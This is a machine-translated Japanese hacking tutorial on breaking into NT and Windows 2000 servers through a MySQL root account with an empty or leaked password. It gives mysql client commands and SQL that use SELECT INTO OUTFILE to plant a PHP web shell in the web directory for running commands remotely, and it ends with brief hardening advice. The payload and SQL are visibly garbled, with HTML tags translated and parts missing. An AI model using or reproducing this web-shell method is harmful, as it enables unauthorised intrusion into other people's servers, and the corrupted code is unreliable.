mysql 経由で NT と win2000 に侵入

mysql

by Coolweis
coolweis@netguard.com.cn

多くの NT および win2000 マシンには、mysql と php が搭載されています。デフォルトの MySQL データベースのルート アカウントは空であるため、侵入者がマシンに侵入する手段を与えてしまいます。データベースのルート アカウントとパスワードが変更され、IIS の他の脆弱性がソース コードの漏洩につながる場合、データベース アカウントとパスワードも表示される可能性があります。データベースのパスワードを取得したと仮定して、mysql データベースを介してマシン上の特定の権限を取得する方法を見てみましょう。
まず、通常の状況では、通常、ほとんどの NT および win2000 マシンは、php を使用する場合、mysql を使用します。デフォルトでは、Windows 上の MySQL はリモート接続を許可します。 LinuxなどにインストールされているMysqlではリモート接続ができません。侵入の目的は、Web ディレクトリにシェル スクリプトを書き込むことです。このシェルを通じて、Ben にコマンドの実行を教えることができます。通常の状況では、Windows の Web サーバーは IIS であり、デフォルトで ASP スクリプトもサポートします。 ASP sehll スクリプトはインターネット上のどこにでもあります。この ASP スクリプトを Web ディレクトリに転送するだけです。しかし、それらのスクリプトはもっと面倒だと思います。ターゲットマシンにphpがある場合は、phpスクリプトを使用できます。ここではphpスクリプトを使用してシェルを記述します。まず、mysql クライアントを使用してマシンに接続し、SQL ステートメントを実行して Web ディレクトリに php シェル スクリプトを生成する必要があります。
C:mysqlbin>mysql -h xxx.xxx.xxx.xxx -uroot
C:mysqlbin>

php.sql の内容は次のとおりです。 TEXT) ;
insert into tmp names(' temp.dat");}?

;

< /form><フォーム名="フォーム2" メソッド="ポスト" アクション=""> <テキストエリア名="テキスト" 行数="50" クラス="フォーム1 "> ;

');
select * from tmp into outfile 'd:\new\cmd2.php';

上記の SQL ステートメントは tmp という名前のテーブルを作成し、スクリプトを入力します。をデータベースに保存し、このスクリプトを d:newcmd2.php として保存します。次に、作成した tmp テーブルを削除します。ここでの d:new のディレクトリは、マシンの Web ディレクトリです。次に、ブラウザに http://xxx.xxx.xxx.xxx/cmd2.php と入力し、このシェルを使用してコマンドを実行します。この時点で、Web サイトに対するゲスト権限を持つシェルを取得しました。このシェル スクリプトを使用して、ファイルをアップロードするための FTP スクリプトを作成できます。また、このシェルを使用して、ゲスト権限で実行できる他の処理を実行することもできます。ここで注意する必要があるのは、cmd2.php がすでに存在する場合、この SQL スクリプトは正常に実行できないことです。このPHPスクリプトは正常に記述できません。
重要な問題は、データベースのパスワードを取得し、Web ディレクトリを見つけられるかどうかです。それからは何も問題はありませんでした。
セキュリティに関する提案: mysql データベースのパスワードを設定し、一定の強度を持たせます。ソース コードの漏洩を避けるために IIS をセットアップします。Web ディレクトリ内のスクリプトやその他のファイルを直接編集しないでください。一部のエディタでは、通常は .bak 拡張子の付いたバックアップ ファイルが自動的に生成されるため、悪意のある攻撃者がその .bak ファイルを直接開く可能性があります。ファイルの漏洩ソースコード (global.asa.bak など)。